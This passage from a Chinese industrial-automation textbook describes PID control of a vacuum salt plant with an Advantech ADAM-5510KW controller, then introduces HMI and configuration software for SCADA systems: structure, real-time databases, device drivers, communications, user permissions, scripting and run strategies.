(3)内建实时时钟和看门狗—利用研华公司提供的Calendar模块(在研华公司的库文件ADAM5000.fwl中),来记录事件和进行定时功能。5510KW控制器内置不同功能的看门狗电路,当系统(MS-DOS)死机时它能自动复位微处理器。ADAM-5510KW控制器提供3种不同类型的看门狗:操作系统看门狗、KW软件看门狗和Modbus通信服务看门狗。这增强了系统的可靠性,并确保ADAM-5510KW 系列控制器能在需要高稳定性的场合中应用。 (4)多种隔离措施保证系统的高可靠性—如电源电压隔离能力为 3000 VDC 、通信口为 2500 VDC、I/O输入与输出模块为2500 VDC。 (5)实时操作系统KW ProConOS (可达16个任务)—ADAM-5510KW 控制器的通信、数据处理和I/O 存取任务都是独立工作的,由上位机编辑好的程序下装至目标控制器即KW5510中,然后供ProConOS实时运行,进行实时采集及控制输出等。 (6)采用标准的IEC 6113-3编程语言进行程序的开发—ADAM-5510KW控制器中的编程语言符合IEC 61131-3的规范,方便了程序的编写及维护。 (7)上位机的组态软件界面友好,组态方便—按工艺要求绘制出美观大方的立体流程图,辅以动态的数值显示、变量的报警、开关量的变色状态显示和风机泵的模拟运行,增加了动态效果;对于液位及压力的PID单回路控制,仿常规调节器的面板制作出了虚拟的仪表面板,所有的操作与常规的调节器操作一样,操作简单、明了。 4.8.3 真空制盐过程PID控制方案及其实现 1.硬件组成 模拟量输入选用ADAM-5017模块,现场变送器将液位、压力等物理信号转换为4~20mA电流信号,作为ADAM-5017的输入,分别对应PID功能块的PV值。ADAM-5017的输入范围设置为:-20~20mA;模拟量输出模样选用ADAM-5024模块,模块输出的4~20mA信号驱动现场的气动调节阀,实现对液位和压力的控制。ADAM-5024的输出范围设置为4~20mA。 2.软件实现 在程序中直接调用Multiprog软件中ProconOS.fwl中的FPID功能块,ADAM-5017的每一路输入即对应该FPID功能块的PV值,PID运算后的MV值经比例关系调整并对应到ADAM-5024的输出;对于FPID的SV、KP、TI、TD、手动/自动无扰切换等均可通过组态软件来进行设置。 在上位机中安装KW-Multiprog软件,并编程。首先,生成PID单回路控制及自动冲洗等方案。其次,利用IEC 61131-3标准语言的FBD功能块图来编程,首先要导入KWProconos、研华提供的ADAM5000库函数,并选用FPID模块及Calendar(时钟)模块,定义或组态好各个参数的值,要注意数据类型一致性,必要时使用数据类型转换模块。编辑好的程序在通过编译后,可通过强大的离线仿真工具在未下装到控制器之前进行程序的调试,也可以下装至5510控制器中供ProconOS系统实时运行。通过在线调试、变量强制赋值等方法来验证程序执行的结果,实现对控制系统的调试直至最终运行。 在Multiprog中编写PID控制程序时,要注意以下几点: (1)PID功能调用FPID功能块即可方便实现;PID调节时,手动/自动无扰切换、SV、Kp、Ti和Td等参数可经过Modbus协议与上位机组态软件的人机接口连接,方便工程师整定参数与操作员控制。 (2)变量ADAM-5017_ch1及ADAM-5024_ch1是指ADAM-5017与ADAM-5024模块的第2个输入/输出通道。 (3)模拟量输入部分:将ADAM-5017模块中16位A/D的采样信号转换为-20~+20mA的电流信号,并送入FPID功能块的“X”端,该端对应为PID算法的PV值。 (4)模拟量输出部分:12位D/A的ADAM-5024模块输出范围是4~20mA;将Yout值(对应MV)转换为0~4095之间的数值送入ADAM-5024,ADAM-5024再将数字量转换为电流,输出到气动调节阀。 (5)在调试PID参数时,过程测量值PV也可通过Modbus协议上传到组态软件中进行曲线显示。 (6)由于一共有5个PID回路,因此开发了5个PID程序模块,这些PID程序中,各个回路的参数设置如表4.16所示。 表4.16 FPID的参数设置 PID部分程序实现如图4.21所示。 图4.21 ADAM-5510KW中PID部分程序的实现调试 3.仿真调试 KW-Multiprog具有强大的仿真调试功能。编译通过后,单击下载按钮进行程序的下载。程序下载到仿真的PLC里后便可运行了,此时会弹出仿真I/O点窗口,如图4.22所示。单击冷启动按钮进入程序运行状态,单击变量监视按钮可以方便的看到变量通断状态,如图4.23所示。 图4.22 虚拟I/O点窗口 图4.23 MULTIPROG程序运行状态 4.应用效果 上述真空制盐PID控制系统的开发和稳定运行表明,采用研华科技的PAC产品ADAM-5510KW可以方便地实现单回路控制功能,PAC与上位机的通信及组态软件的整合也非常紧密、流畅。在PAC中实现PID功能灵活、方便。传统的过程控制多采用智能仪表或DCS设备,而随着IEC 61131-3的迅速推广和PAC功能的不断加强和扩展,各种基于PAC的控制系统越来越具有技术成熟、可靠性高和组态方便等特点,它们在工业过程控制中必将得到更普遍的应用,也会给企业带来良好的经济效益。 第5章 工业控制组态软件 5.1 人机界面 人机界面是指人和机器在信息交换和功能上接触或互相影响的人机结合面,英文称作Human Machine Interface(HMI),有些地方也称为Man Machine Interface(MMI)。目前由于信息技术已经深入地影响了人们的生活和工作,特别是各种移动设备的广泛应用,人们几乎时时刻刻都要进行人机操作,比如,利用手机上网、在银行ATM机上操作等。 在工业自动化领域,主要有两种类型的人机界面。 (1)在制造业流水线及机床等单体设备上,大量采用了PLC作为控制设备,但是PLC自身没有显示、键盘输入等人机交互功能,因此,通常需要配置触摸屏或嵌入式工业计算机作为人机界面,它们通过与PLC通信,实现对生产过程的现场监视和控制,同时还可进行参数设置、参数显示、报警、打印等功能。图5.1所示为某应用中的终端操作界面。针对触摸屏这类嵌入式人机界面(或称操作员终端面板,Operator Interface Panel),通常需要在PC上利用设备配套的人机界面开发软件,按照系统的功能要求进行组态,形成工程文件,对该文件进行功能测试后,将工程文件下载到触摸屏存储器中,就可实现监控功能。为了与位于控制室的人机界面应用相区别,这种类型的人机界面也常称作终端(以下用此称法)。由于PLC与终端的组合几乎是标配,因此,几乎所有的主流PLC厂商都生产终端设备,同时,还有大量的第三方厂家生产终端。通常,这类厂家的终端配套的人机界面开发软件支持市面上主流的PLC产品和多种通信协议,因此能和各种厂家的PLC配套使用。一般而言,第三方厂家的设备在价格上有较大优势,支持的设备种类也较多。 图5.1 终端人机界面应用 (2)工业控制系统通常是分布式控制系统,各种控制器在现场设备附近安装,为了实现全厂的集中监控和管理,需要设立一个统一监视、监控和管理整个生产过程的中央监控系统,中央监控系统的服务器与现场控制站进行通信,工程师站、操作员站等需要安装配置对生产过程进行监视、控制、报警、记录、报表功能的工控应用软件,具有这样功能的工控应用软件也称为人机界面。这一类人机界面通常是用工控组态软件(后简称组态软件)开发。和触摸屏终端相比,不存在工程下装(download)的问题,这类应用软件直接运行在工作站上(通常是商用机器、工控机或工作站)。 本章重点介绍内容更加丰富的工控组态软件。 5.2 组态软件的产生及发展 工业控制的发展经历了手动控制、仪表控制和计算机控制等几个阶段。特别是随着集散控制系统的发展和在流程工业控制中的广泛应用,集散控制中采用组态工具来开发控制系统应用软件的技术得到了广泛的认可。特别是随着PC的普及和计算机控制在众多行业应用中的增加,以及人们对工业自动化的要求不断提高,传统的工业控制软件已无法满足应用的需求和挑战。在开发传统的工业控制软件时,一旦工业被控对象有变动,就必须修改其控制系统的源程序,导致开发周期延长;已开发成功的工控软件又因控制项目的不同而重复使用率很低,导致其价格非常昂贵;在修改工控软件的源程序时,倘若原编程人员因工作变动而离去时,则必须由其他人员或新手进行源程序的修改,因而更困难。 随着微电子技术、计算机技术、软件工程和控制技术的发展,作为用户无需改变运行程序源代码的软件平台工具—组态软件(Configuration software)便逐步产生并不断发展。由于组态软件在实现工业控制的过程中免去了大量繁琐的编程工作,解决了长期以来控制工程人员缺乏丰富的计算机专业知识与计算机专业人员缺乏控制工程现场操作技术和经验的矛盾,极大地提高了自动化工程的开发效率及工控软件的可靠性。近年来,组态软件不仅在中小型工业控制系统中广泛应用,也成为大型SCADA系统开发人机界面和监控应用最主要的应用软件,在配电自动化、智能楼宇、农业自动化、能源监测等领域也得到了众多应用。图5.2所示就是用组态软件开发的化工过程监控系统人机界面。 图5.2 用组态软件开发的监控系统人机界面 “组态”的概念最早来自英文Configuration,其含义是使用软件工具对计算机及软件的各种资源进行配置(包括进行对象的定义、制作和编辑,并设定其状态特征属性参数),达到使计算机或软件按照预先设置,自动执行特定任务,满足使用者要求的目的。在控制界,“组态”一词应该首先出现在DCS中。组态软件自20世纪80年代初期诞生至今,已有20多年的发展历史。应该说组态软件作为一种应用软件,是随着PC的兴起而不断发展的。20世纪80年代的组态软件,像Onspec、Paragon 500、早期的FIX等都运行在DOS环境下,图形界面的功能不是很强,软件中包含着大量的控制算法,这是因为DOS具有很好的实时性。20世纪90年代,随着微软的图形界面操作系统Windows 3.0风靡全球,以Wonderware公司的组态软件Intouch为代表的人机界面开发软件开创了Windows下运行工控软件的先河,Wonderware因而在不长的时间内成为全球最大的独立自动化软件厂商(该公司后来被英国Invensys收购)。这些组态软件的主要特点有以下几点: (1)延续性和扩充性好。用组态软件开发的应用程序,当现场硬件设备有增加,系统结构有变化或用户需求发生改变时,通常不需要很多修改就可以通过组态的方式顺利完成软件的更新和升级。 (2)封装性高。组态软件所能完成的功能都用一种方便用户使用的方法包装起来,对于用户,不需掌握太多的编程语言技术(甚至不需要编程技术),就能很好地完成一个复杂工程所要求的所有功能。 (3)通用性强。不同的行业用户,都可以根据工程的实际情况,利用组态软件提供的底层设备(PLC、智能仪表、智能模块、板卡、变频器等)的I/O 驱动程序、开放式的数据库和画面制作工具,就能完成一个具有生动图形界面、动画效果、实时数据显示与处理、历史数据、报警和记录、具有多媒体功能和网络功能的工程,不受行业限制。 (4)人机界面友好。用组态软件开发的监控系统人机界面具有生动、直观的特点,动感强烈,画面逼真,深受现场操作人员的欢迎。 (5)接口趋向标准化。如组态软件与硬件的接口,过去普遍采用定制的驱动程序,现在普遍采用OPC规范。此外,数据库接口也采用工业标准。 由于市场对组态软件的巨大需求,从1990年开始,国产组态软件逐步出现,如北京亚控科技发展有限公司的组态王系列产品、北京三维力控科技有限公司的力控、北京昆仑通态自动化软件科技有限公司的MCGS等。这些产品以价格低、驱动丰富等特点,在中小型工业监控系统开发中得到了广泛应用,积累了大量客户。近年来,随着计算机软、硬件技术的发展,组态软件的开发门槛逐步降低,越来越多的公司加入到组态软件的开发中来,新的产品不断出现。但总体来讲,虽然这些新的产品都具有一定的技术特色,但主要的功能还是比较相似,出现了一定的趋同性。 5.3 组态软件的功能需求 组态软件的使用者是自动化工程设计人员。组态软件包的主要目的是使使用者在生成适合自己需要的应用系统时不需要修改软件程序的源代码,因此不论采取何种方式设计组态软件,都要面对和解决控制系统设计时的公共问题,满足这些要求的组态软件才能真正符合工业监控的要求,能够被市场接受和认可。这些问题主要有以下几点: (1)如何与采集、控制设备进行数据交换,即广泛支持各种类型的I/O设备、控制器和各种现场总线技术和网络技术。 (2)多层次的报警组态和报警事件处理、报警管理和报警优先级等。如支持对模拟量、数字量报警及系统报警等;支持报警内容设置,如限值报警、变化率报警、偏差报警等。 (3)存储历史数据并支持历史数据的查询和简单的统计分析。工业生产操作数据,包括实时和历史数据是分析生产过程状态,评价操作水平的重要信息,对加强生产操作管理和优化具有重要作用。 (4)各类报表的生成和打印输出。不仅组态软件支持简单的报表组态和打印,还要支持采用第三方工具开发的报表与组态软件数据库连接。 (5)为使用者提供灵活、丰富的组态工具和资源。这些工具和资源可以适应不同应用领域的需求,此外,在注重组态软件通用性的情况下,还能支持行业应用。 (6)最终生成的应用系统运行稳定可靠,不论对于单机系统还是多机系统,都要确保系统能长期安全、可靠、稳定工作。 (7)具有与第三方程序的接口,方便数据共享。 (8)简单的回路调节;批次处理;SPC过程质量控制。 (9)如果内嵌入软逻辑控制,软逻辑编程软件要符合IEC 61131-3标准。 (10)安全管理,即系统对每个用户都具有操作权限的定义,系统对每个重要操作都可以形成操作日志记录,同时有完备的安全管理制度。 (11)对Internet/Interanet的支持,可以提供基于Web的应用。 (12)多机系统的时钟同步,系统可由GPS全球定位时钟提供标准时间,同时向全系统发送对时命令,包括监控主机和各个客户机、下位机等。可实现与网络上其他系统的对时服务,支持人工设置时间功能。 (13)开发环境与运行环境切换方便,支持在线组态功能。即在运行环境时也可以进行一些功能修改和组态,刷新后修改后的功能即生效。 自动化工程设计技术人员在组态软件中只需填入一些事先设计的表格,利用图形功能把被控对象,如反应罐温度计、锅炉趋势曲线、报表等形象地画出来,通过内部数据连接把被控对象的属性与I/O设备的实时数据进行逻辑连接。当由组态软件生成的应用系统投入运行后,与被控对象连接的I/O设备数据发生变化直接带动被控对象的属性变化。 为了设计出满足上述要求的组态软件系统,要特别注意系统的架构设计和关键技术的使用。在设计中,一方面要兼顾一般性与特性,也要遵从通用软件的设计思想,注重安全性和可靠性、标准化、开放性和跨平台操作等。 5.4 组态软件系统构成与技术特色 5.4.1 组态软件的总体结构及其相似性 组态软件主要作为SCADA系统及其他控制系统的上位机人机界面的开发平台,为用户提供快速地构建工业自动化系统数据采集和实时监控功能服务。而不论什么样的过程监控,总是有相似的功能要求。因此,不论什么样的组态软件,它们在整体结构上都具有相似性,只是不同的产品实现这些功能方式有所不同。如图5.2所示就是组态王提供的演示版面运行界面,不是上面的文字提示,很难看出该监控界面是用什么组态软件开发的。 从目前主流的组态软件产品看,组态软件由开发系统与运行系统组成,如图5.3所示。系统开发环境是自动化工程设计师为实施其控制方案,在组态软件的支持下进行应用程序的系统生成工作所必须依赖的工作环境,通过建立一系列用户数据文件,生成最终的图形目标应用系统,供系统运行环境运行时使用。 系统运行环境由若干个运行程序支持,如图形界面运行程序、实时数据库运行程序等。在系统运行环境中。系统运行环境将目标应用程序装入计算机内存并投入实时运行。不少组态软件都支持在线组态,即在不退出系统运行环境下修改组态,使修改后的组态在运行环境中直接生效。当然,如果修改了图形界面,必须刷新该界面新的组态才能显示。维系组态环境与运行环境的纽带是实时数据库,如图5.3所示。 图5.3 组态软件结构 运行环境系统由任务来组织,每个任务包括一个控制流程,由控制流程执行器来执行。任务可以由事件中断、定时时间间隔、系统出错或报警及上位机指令来调度。每个任务有优先级设置,高优先级的任务能够中断低优先级任务。同优先级的程序若时间间隔设置不同,可通过竞争,抢占CPU使用权。在控制流程中,可以进行逻辑或数学运算、流程判断和执行、设备扫描及处理和网络通信等。此外,运行环境还包括以下一些服务: (1)通信服务:实现组态软件与其他系统之间的数据交换。 (2)存盘服务:实现采集数据的存储处理操作。 (3)日志服务:实现系统运行日志记录功能。 (4)调试服务:辅助实现开发过程中的调试功能。 组态软件的功能相似性还表现在以下几个方面: (1)目前绝大多数工控组态软件都可运行在Windows 2000/XP环境下,部分还可以运行在VISTA操作系统下。这些软件界面友好、直观、易于操作。 (2)现有的组态软件多数以项目(Project)的形式来组织工程,在该项目中,包含了实现组态软件功能的各个模块,包括I/O设备、变量、图形、报警、报表、用户管理、网络服务、系统冗余配置和数据库连接等。 (3)组态软件的相似性还表现在目前的组态软件都采用TAG数来组织其产品和进行销售,同一公司产品的价格主要根据点数的多少而定;而软件的加密多数采用硬件狗。部分产品也支持软件License。 5.4.2 组态软件的功能部件 为了解决5.3节指出的问题,完成监控与数据采集等功能,简化程序开发人员的组态工作,易于用户操作和管理。一个完整的组态软件基本上都包含以下一些部件,只是不同的系统,这些构件所处的层次、结构会有所不同,名称也会不一样。 1. 人机界面系统 人机界面系统实际上就是所谓的工况模拟动画。人机界面组态中,要利用组态软件提供的工具,制作出友好的图形界面给控制系统用,其中包括被控过程流程图、曲线图、棒状图、饼状图、趋势图,以及各种按钮、控件等元素。人机界面组态中,除了开发出满足系统要求的人机界面外,还要注意运行系统中画面的显示、操作和管理。 在组态软件中进行工程组态的第一步即是制作工况模拟动画,动画制作分为静态图形设计和动态属性设置两个过程。静态图形设计类似于“画画”,用户利用组态软件中提供的基本图形元素,如线、填充形状、文本及设备图库,在组态环境中“组合”成工程的模拟静态画面。静态图形设计在系统运行后保持不变,与组态时一致。动态属性设置则完成图形的动画属性,与实时数据库中定义的变量建立相关性的连接关系,作为动画图形的驱动源。动态属性与确定该属性的变量或表达式的值有关。表达式可以是来自I/O设备的变量,也可以是由变量和运算符组成的数学表达式,它反映图形大小、颜色、位置、可见度、闪烁性等状态的特征参数,随着表达式的值的变化而变化。人机界面系统的设计还包括报警组态及输出、报表组态及打印、历史数据检索与显示等功能。各种报警、报表、趋势的数据源都可以通过组态作为动画链接的对象。 组态软件给用户最深刻印象的就是图形用户界面。在组态软件中,图形主要包括位图与矢量图。所谓位图就是由点阵所组成的图像,一般用于照片品质的图像处理。位图的图形格式多采用逐点扫描、依次存储的方式。位图可以逼真的反映外界事物,但放大时会引起图像失真,并且占用空间较大。即使现在流行的jpeg图形格式也不过是采用对图形隔行隔列扫描从而进行存储的,虽然所占用空间变小,但是同样在放大时引起失真。矢量图是由轮廓和填空组成的图形,保存的是图元各点的坐标,其构造原理与位图完全不同。矢量图形,在数学上定义为一系列由线连接的点。矢量文件中的图形元素称为对象,每个对象都是一个自成一体的实体,它具有颜色、形状、轮廓、大小和屏幕位置等属性。因为每个对象都是一个自成一体的实体,就可以在维持它原有清晰度和弯曲度的同时,多次移动和改变它的属性,而不影响图例中其他对象。矢量图的优点主要表现在以下3点: (1)克服了位图所固有的缺陷,文件体积小,具有无级缩放、不失真的特点,并可以方便的进行修改、编辑。 (2)基于矢量图的绘图同分辨率无关,这意味着它们可以按照最高分辨率显示到输出设备上,并且现场操作站显示器的升级等不影响矢量图画面。 (3)可以和位图图形集成在一起,也可以把它们和矢量信息结合在一起以产生更加完 正因为如此,在组态软件中大量使用矢量图。 2. 实时数据库系统 实时数据库是组态软件的数据处理中心,特别是对于大型分布式系统,实时数据库的性能在某种方面就决定了监控软件的性能。它负责实时数据运算与处理、历史数据存储、统计数据处理、报警处理、数据服务请求处理等。实时数据库实质上是一个可统一管理的、支持变结构的、支持实时计算的数据结构模型。在系统运行过程中,各个部件独立地向实时数据库输入和输出数据,并完成自己的差错控制以减少通信信道的传输错误,通过实时数据库交换数据,形成互相关联的整体。因此,实时数据库是系统各个部件及其各种功能性构件的公用数据区。 组态软件实时数据库系统的含义已远远超过了一个简单的数据库或一个简单的数据处理软件,它是一个实际可运行的,按照数据存储方式存储、维护和向应用程序提供数据或信息支持的复杂系统。因此,实时数据库系统的开发设计应该视为一个融入了实时数据库的计算机应用系统的开发设计。 数据库是组态软件的核心,数据来源途径的多少将直接决定开发设计出来的组态软件的应用领域与范围。组态软件基本都有与广泛的数据源进行数据交换的能力,如提供更多厂家的硬件设备的I/O驱动程序;能与Microsoft Access、SQL Sever、Oracle等众多的ODBC数据库连接;全面支持OPC标准,从OPC服务器直接获取动态数据;全面支持动态数据交换(DDE)标准和其他支持DDE标准的应用程序,如与EXCEL进行数据交换;全面支持Windows可视控件及用户自己用VB或VC++开发的ActiveX控件。 组态软件实时数据库的主要特征是实时、层次化、对象化和事件驱动。所谓层次化是指不仅记录一级是层次化的,在属性一级也是层次化的。属性的值不仅可以是整数、浮点数、布尔量和定长字符串等简单的标量数据类型,还可以是矢量和表。采取层次化结构便于操作员在一个熟悉的环境中对受控系统进行监视和浏览。对象是数据库中一个特定的结构,表示监控对象实体的内容,由项和方法组成。项是实体的一些特征值和组件。方法表示实体的功能和动作。事件驱动是Windows编程中最重要的概念,在组态软件中,一个状态变化事件引起系统产生所有报警、时间、数据库更新,以及任何关联到这一变化所要求的特殊处理。如数据库刷新事件通过集成到数据库中的计算引擎执行用户定制的应用功能。 此外,组态软件实时数据库还支持处理优先级、访问控制和冗余数据库的数据一致性等功能。 3. 设备组态与管理 组态软件中,实现设备驱动的基本方法是:在设备窗口内配置不同类型的设备构件,并根据外部设备的类型和特征,设置相关的属性,将设备的操作方法和硬件参数配置、数据转换、设备调试等都封装在设备构件中,以对象的形式与外部设备建立数据的传输特性。 组态软件对设备的管理是通过对逻辑设备名的管理实现的,具体地说就是每个实际的I/O设备都必须在工程中指定一个唯一的逻辑名称,此逻辑设备名就对应一定的信息,如设备的生产厂家、实际设备名称、设备的通信方式、设备地址等。在系统运行过程中,设备构件由组态软件运行系统统一调度管理。通过通道连接,它可以向实时数据库提供从外部设备采集到的数据,供系统其他部分使用。 采取这种结构形式使得组态软件成为一个“与设备无关”的系统,对于不同的硬件设备,只需要定制相应的设备构件放置到设备管理子系统中,并设置相关的属性,系统就可以对这设备进行操作,而不需要对整个软件的系统结构做任何改动。 4. 网络应用与通信系统 广义的通信系统是指传递信息所需的一切技术设备的总和。这里所谓的通信系统是组态软件与外界进行数据交换的软件系统,对于组态软件来说,包含以下几个方面: (1)组态软件实时数据库等与I/O设备的通信。 (2)组态软件与第三方程序的通信,如与MES组件的通信、与独立的报表应用程序的通信等。 (3)复杂的分布式监控系统中,不同SCADA节点之间的通信,如主机与从机间的通信(系统冗余时)、网络环境下SCADA服务器与SCADA客户机之间的通信、基于Internet或Intranet应用中的Web服务器与Web客户机的通信等。 组态软件在设计时,一般都考虑到解决异构环境下不同系统之间的通信。用户需要自己的组态软件与主流I/O设备及第三方厂商提供的应用程序之间进行数据交换,应使开发设计的软件支持目前主流的数据通信、数据交换标淮。组态软件通过设备驱动程序与I/O设备进行数据交换,包括从下位机采集数据和发送来自上位机的设备指令。设备驱动程序是由高级语言编写的DLL(动态连接库)文件,其中包含符合各种I/O设备通信协议的处理程序。组态软件负责在运行环境中调用相应的I/O设备驱动程序,将数据传送到工程中各个部分,完成整个系统的通信过程。组态软件与I/O设备之间通常通过以下几种方式进行数据交换:串行通信方式(支持Modem远程通信)、板卡方式(ISA和PCI等总线)、网络节点方式(各种现场总线接口I/O及控制器)、适配器方式、DDE(快速DDE)方式、OPC方式、ODBC方式等。可采用NetBIOS、NetBEUI、IPX/SPX、TCP/IP协议联网。 自动化软件正逐渐成为协作生产制造过程中不同阶段的核心系统,无论是用户还是硬件供应商都将自动化软件作为全厂范围内信息收集和集成的工具,这就要求自动化软件大量采用“标准化技术”,如OPC、DDE、ActiveX控件、COM/DCOM等,这样使得自动化软件演变成软件平台,在软件功能不能满足用户特殊需要时,用户可以根据自己的需要进行二次开发。比如组态王中提供了4个开发工具包,就是使用户可以进行二次开发。自动化软件采用标准化技术还便于将局部的功能进行互连。在全厂范围内,不同厂家的自动化软件也可以实现互连,避免了“信息孤岛”现象。 5. 控制系统 控制系统以基于某种语言的策略编辑、生成组件为代表,是组态软件的重要组成部分。组态软件控制系统的控制功能主要表现在弥补传统设备(如PLC、DCS、智能仪表或基于PC的控制)控制能力的不足。目前实际运行中的工控组态软件都是引入“策略”的概念来实现组态软件的控制功能。策略相当于高级计算机语言中的函数,是经过编译后可执行的功能实体。控制策略构件由一些基本功能模块组成,一个功能模块实质上是一个微型程序(但不是一个独立的应用程序),代表一种操作、一种算法或一个变量。在很多组态软件中,控制策略是通过动态创建功能模块类的对象实现的。功能模块是策略的基本执行元素,控制策略以功能模块的形式来完成对实时数据库的操作、现场设备的控制等功能。在设计策略控件的时候我们可以利用面向对象的技术,把对数据的操作和处理封装在控件的内部,而提供给用户的只是控件的属性和操作方法。用户只需在控件的属性页中正确设置属性值和选定控件的操作方法,就可满足大多数工程项目的需要。而对于特殊的复杂控制工程,开发设计组态软件时应该为用户提供创建运行策略的良好构架,使用户比较容易地将自己编制或定制的功能模块以构件的形式装入系统设立的控件箱内,以便在组态控制系统中方便地调用,实现用户自定义的功能。 6. 系统安全与用户管理 组态软件提供了一套完善的安全机制。用户能够自由组态控制菜单、按钮和退出系统的操作权限,只允许有操作权限的操作员对某些功能进行操作、对控制参数进行修改,防止意外地或非法地关闭系统、进入开发环境修改组态或者对未授权数据进行更改等操作。图5.4所示为西门子WinCC组态软件的用户管理窗口。 图5.4 WinCC的用户管理窗口 组态软件的操作权限机制和Windows NT/XP 类似,采用用户组和用户的机制来进行操作权限的控制。在组态软件中可以定义多个用户组,每个用户组可以有多个用户,而同一用户可以隶属于多个用户组。操作权限的分配是以用户组为单位进行的,即某种功能的操作哪些用户组有权限,而某个用户能否对这个功能进行操作取决于该用户所在的用户组是否具备对应的操作权限。通过建立操作员组、工程师组、负责人组等不同操作权限的用户组,可以简化用户管理,确保系统安全运行。 iFIx还可以将这种用户管理和操作系统的用户管理关联起来,以简化应用软件的用户管理。一些组态软件(如组态王、MCGS5.1)还提供了工程密码、锁定软件狗、工程运行期限等功能,来保护使用组态软件的开发商所得的成果,开发者还可利用这些功能保护自己的合法权益。 7. 脚本语言 脚本程序的起源要追溯到DCS支持的高级语言。早期的多数DCS均支持1~2种高级语言(如Fortran、Pascal、Basic、C等)。1991年Honeywell公司新推出的TDC3000LCN/ UCN系统支持CL(Control Lanuage)语言,这既简化了语法,又增强了控制功能,把面向过程的控制语言引入了新的发展阶段。所谓脚本语言即组态软件内置的编程语言。在组态软件中,脚本语言统称Script。 虽然采用组态软件开发人机界面把控制工程师从繁琐的高级语言编程中解脱出来了,它们只需要通过鼠标的拖、拉等操作就可以开发监控系统。但是,这种采取类似图形编程语言方式开发系统毕竟有其局限性。在监控系统中,有些功能的实现还是要依赖一些脚本来实现。例如可以在按下某个按钮时,打开某个窗口;或当某一个变量的值变化时,用脚本触发系列的逻辑控制,改变变量的值、图形对象的颜色、大小,控制图形对象的运动等。 所有的脚本都是事件驱动的。事件可以是数据更改、条件、单击鼠标、计时器等。在同一个脚本程序内处理顺序按照程序语句的先后顺序执行。不同类型的脚本决定在何处以何种方式加入脚本控制。目前组态软件的脚本语言主要有以下几种: (1)自行开发脚本语言,如组态王等。这些语言类似C语言或BASIC语言,这种语言总体上比较简单,易学易用,控制工程师也比较熟悉。但是总体上这种编程语言功能比较有限,能提供的库函数也不多,但实现成本相对较低。图5.5所示即为组态王的脚本语言编辑环境。 (2)采用VBA,如iFIX等组态软件。VBA比较简单、易学。采用VBA后,整个系统的灵活性大大加强,控制工程师编程的自由度也扩大了很多,一些组态软件本身不具有的功能通过VBA可以实现,而且控制工程师还可以开发一些针对特定行业的应用。 (3)支持多种脚本语言,目前来看,只有西门子的WinCC。图5.6和图5.7所示即为WinCC的C++脚本语言编辑环境和VBA脚本语言编程环境。 脚本语言的使用,极大地增强了软件组态时的灵活性,使组态软件具有了部分高级语言编程环境的灵活性和功能。典型的如可以引入事件驱动机制,当有窗口装入、卸载事件,当有鼠标左、右键的单击、双击事件,当有某键盘事件及其他各种事件发生时,就可以让对应的脚本程序执行。 图5.5 组态王的脚本语言编辑窗口 图5.6 WinCC脚本语言编辑窗口之一(C++语言) 图5.7 WinCC的脚本语言编辑窗口之二(VBA) 脚本程序一般都具有语法检查等功能,方便开发人员检查和调试程序,并通过内置的编译系统将脚本编译成计算机可以执行的运行代码。 脚本程序不仅能利用脚本编程环境提供的各种字符串函数、数学函数、文件操作等库函数,而且可以利用API函数来扩展组态软件的功能。 8. 运行策略 所谓运行策略,是用户为实现对运行系统流程自由控制所组态生成的一系列功能模块的总称。运行策略的建立,使系统能够按照设定的顺序和条件,操作实时数据库,控制用户窗口的打开、关闭以及设备构件的工作状态,从而达到对系统工作过程精确控制及有序调度的目的。通过对运行策略的组态,用户可以自行完成大多数复杂工程项目的监控软件,而不需要繁琐的编程工作。 按照运行策略的不同作用和功能,一般把组态软件的运行策略分为启动策略、退出策略、循环策略、报警策略、事件策略、热键策略及用户策略等。每种策略都由一系列功能模块组成。 启动策略是指在系统运行时自动被调用一次,通常完成一些初始化等工作。 退出策略在退出时自动被系统调用一次。退出策略主要完成系统退出时的一些复位操作。有些组态软件的退出策略可以组态为退出监控系统运行状态转入开发环境、退出运行系统进入操作系统环境、退出操作系统并关机3种形式。 循环策略是指在系统运行时按照设定的时间循环运行的策略,在一个运行系统中,用户可以定义多个循环策略。 报警策略是用户在组态时创建,在报警发生时该策略自动运行。 事件策略是用户在组态时创建,当对应表达式的某种事件状态为真时,事件策略被自动调用。事件策略里可以组态多个事件。 热键策略由用户组态时创建,在用户按下某个热键时该策略被调用。 用户策略由用户在组态时创建,在系统运行时供系统其他部分调用。 当然,需要说明的是,不同的组态软件中对于运行策略功能的实现方式是不同的,运行策略的组态方法也相差较大。 5.4.3 组态软件技术特色 不同的组态软件在系统运行方式、操作和使用上都会有自己的特色,但它们总体上都具有以下特点。 1)简单灵活的可视化操作界面 组态软件多采用可视化、面向窗口的开发环境,符合用户的使用习惯和要求。以窗口或画面为单位,构造用户运行系统的图形界面,使组态工作既简单直观,又灵活多变。用户可以使用系统的默认架构,也可以根据需要自己组态配置,生成各种类型和风格的图形界面及组织这些图形界面。 2)实时多任务特性 实时多任务性是工控组态软件的重要特点和工作基础。在实际工业控制中,同一台计算机往往需要同时进行实时数据的采集、处理、存储、检索、管理、输出,算法的调用,实现图形、图表的显示,报警输出,实时通信等多个任务。实时多任务特性是衡量系统性能的重要指标,特别是对于大型系统,这一点尤为重要。 3)强大的网络功能 可支持Client-Server模式,实现多点数据传输;能运行于基于TCP/IP网络协议的网络上,利用Internet浏览器技术实现远程监控;提供基于网络的报警系统、基于网络的数据库系统、基于网络的冗余系统;实现以太网与不同的现场总线之间的通信。 4)高效的通信能力 简单地说,组态软件的通信即上位机与下位机的数据交换。开放性是指组态软件能够支持多种通信协议,能够与不同厂家生产的设备互连,从而实现完成监控功能的上位机与完成数据采集功能的下位机之间的双向通信,它是衡量工控组态软件通信能力的标准。能够实现与不同厂家生产的各种工控设备的通信是工控组态软件得以广泛应用的基础。 5)接口的开放特性 接口开放可以包括两个方面的含义: (1)就是用户可以很容易地根据自己的需要,对组态软件的功能进行扩充。由于组态软件是通用软件,而用户的需要是多方面的,因此,用户或多或少都要扩充通用版软件的功能,这就要求组态软件留有这样的接口。例如,现有的不少组态软件允许用户可以很方便地用VB或VC++等编程工具自行编制或定制所需的设备构件,装入设备工具箱,不断充实设备工具箱。有些组态软件提供了一个高级开发向导,自动生成设备驱动程序的框架,给用户开发I/O设备驱动程序工作提供帮助。用户还可以使用自行编写动态链接库DLL的方法在策略编辑器中挂接自己的应用程序模块。 